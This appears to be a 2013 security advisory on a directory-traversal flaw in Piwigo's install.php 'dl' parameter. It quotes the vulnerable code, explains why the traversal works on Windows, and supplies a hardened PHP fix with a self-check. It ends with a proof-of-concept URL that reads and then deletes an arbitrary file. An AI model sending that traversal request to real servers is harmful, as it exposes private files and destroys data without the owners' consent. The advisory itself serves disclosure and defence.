Piwigo is a photo gallery script written in PHP.
Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script: the value is concatenated straight into a filesystem path with no check for directory-traversal sequences. An attacker can therefore use this flaw to read arbitrary files on the affected host that the web server process can read and, because the handler unlinks the file after sending it, to delete arbitrary files within the context of the affected application in the same request.
====================================================================
/install.php (lines 113-124):
-------------
// $_GET['dl'] is appended to the data directory path unchanged; nothing
// rejects or normalises "../" before the file_exists() check.
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);   // arbitrary file read
  unlink($filename);                   // the file just served is then deleted
  exit();
}
====================================================================

Because the fixed prefix 'pwg_' is glued directly onto the attacker-controlled value, the first path component of the PoC below is 'pwg_..'. On Windows the '..' segments are collapsed lexically during path normalisation, so the non-existent component 'pwg_..' is simply discarded and the traversal resolves; on a POSIX filesystem the kernel would have to find a real directory named 'pwg_..', so the same request fails there unless such a directory exists. Note also that the read is always followed by unlink(), so every successful download of a file that the web server process may delete destroys it.
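A hardened replacement for the download branch above, added here as an example (it is neither Piwigo's own code nor the vendor patch linked below). It assumes the data directory path is passed in as $data_dir and that the only file the installer ever offers for download is pwg_database.inc.php, the name the Content-Disposition header above suggests; the allow-list, the function names and the CLI self-check are this example's own assumptions.

```php
<?php
// Added example, not Piwigo's code or the vendor patch.
// Assumption: the installer only ever offers pwg_database.inc.php, so the
// 'dl' value is matched exactly against that one name.
const DOWNLOAD_ALLOWLIST = ['database.inc.php'];

/**
 * Return the absolute path of the file to serve, or null to refuse.
 * Two independent checks:
 *  1. exact-match allow-list: no "../", slashes or NUL bytes can pass it;
 *  2. realpath containment: the resolved file must sit inside $data_dir,
 *     which catches any future mistake in the allow-list or path assembly.
 */
function resolve_download_path(string $dl, string $data_dir): ?string
{
    if (!in_array($dl, DOWNLOAD_ALLOWLIST, true)) {
        return null;
    }
    $base = realpath($data_dir);
    $candidate = realpath($data_dir . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
    if ($base === false || $candidate === false) {
        return null;             // data dir missing or file does not exist
    }
    // Compare with a trailing separator so "/srv/pwg/_data2" is not
    // mistaken for a location inside "/srv/pwg/_data".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Hardened version of the install.php branch quoted above.
function serve_config_download(string $data_dir): void
{
    if (empty($_GET['dl']) || !is_string($_GET['dl'])) {
        return;
    }
    $filename = resolve_download_path($_GET['dl'], $data_dir);
    if ($filename === null) {
        http_response_code(400);
        exit('invalid download request');
    }
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Disposition: attachment; filename="database.inc.php"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($filename));
    readfile($filename);
    unlink($filename);   // still deleted, but now only ever the generated config
    exit();
}

// Self-check from the command line against a constructed temporary data
// directory (not real Piwigo data): the legitimate name resolves, the
// advisory's traversal value and a NUL-byte variant are refused.
if (PHP_SAPI === 'cli') {
    $tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwg_demo_' . getmypid();
    mkdir($tmp);
    file_put_contents($tmp . DIRECTORY_SEPARATOR . 'pwg_database.inc.php', "<?php // generated config\n");
    var_dump(resolve_download_path('database.inc.php', $tmp) !== null);
    var_dump(resolve_download_path('../../../../../../lio_passwords.txt', $tmp));
    var_dump(resolve_download_path("database.inc.php\0", $tmp));
    unlink($tmp . DIRECTORY_SEPARATOR . 'pwg_database.inc.php');
    rmdir($tmp);
}
```

The allow-list alone closes the traversal; the realpath containment check is kept as defence in depth, and because it runs on the already-resolved path it does not depend on the platform-specific handling of 'pwg_..' discussed above.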
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.40
           MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                          @zeroscience
Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
15.02.2013
--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt